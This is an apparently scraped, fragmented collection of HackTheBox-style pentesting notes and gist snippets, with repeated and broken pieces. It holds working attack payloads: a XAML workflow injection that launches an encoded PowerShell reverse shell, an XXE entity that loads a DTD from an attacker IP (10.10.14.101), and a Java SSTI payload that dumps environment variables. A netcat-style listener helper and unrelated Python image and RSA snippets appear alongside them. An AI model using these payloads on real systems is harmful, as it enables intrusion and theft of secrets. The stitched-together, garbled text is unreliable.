- By default, it will start the litener on port 9090. You can specify the port you want it to start with
shell 9001
shell() {
if [[ $1 ]]; then
port=$1
else
port=9090
fi
#!/bin/bash | |
HTB_DATA_DIR=~/Documents/HTB | |
if [[ $1 ]]; then | |
a=1 | |
else | |
echo "Usage: $0 <Box name>" | |
exit 1 | |
fi |
shell 9001
shell() {
if [[ $1 ]]; then
port=$1
else
port=9090
fi
<?xml version="1.0" encoding="UTF-8"?> | |
<WorkflowService xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:mca="clr-namespace:Microsoft.CSharp.Activities;assembly=System.Activities" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" ConfigurationName="Service1" Name="Service1"> | |
<p1:Sequence DisplayName="Sequential Service"> | |
<p1:InvokeMethod DisplayName="test" MethodName="Start"> | |
<p1:InvokeMethod.TargetObject> | |
<p1:InArgument x:TypeArguments="sd:Process"> | |
<mca:CSharpValue x:TypeArguments="sd:Process">/*/System.Diagnostics.Process.Start("");return base.RewriteExpressionTree(expression);} | |
System.Diagnostics.Process x =System.Diagnostics.Process.Start("cmd.exe", "/c powershell -exec bypass -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4 |
ll
alias ll='ls -alhF'
xclip
in your system. This will let you copy output of a command directly to your clipboard. - cat file.txt|c
alias c='xclip -selection clipboard'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
<author>&xxe;</author>
</credits>
Typically java ssti payloads start with $
. But if that character is banned you can use *
instead of that.
Get env vars
*{T(java.lang.System).getenv()}
/etc/passwd
)#!/usr/bin/env python | |
from PIL import Image, FontFile, ImageFont, ImageDraw | |
class RenderText2Image: | |
##Defines | |
FULL_PATH_TO_FONT = './LiberationMono-Regular.ttf' | |
_bgcolor = None | |
_fontColor = None | |
_text = None | |
_error, _errmsg = 1, None |
from Crypto.PublicKey import RSA | |
from base64 import b64encode as b64 | |
def int2bytes(number): | |
return number.to_bytes((number.bit_length() + 7) // 8, byteorder="big") | |
fp = open("publickey.crt", "r") | |
key = RSA.importKey(fp.read()) | |
fp.close() |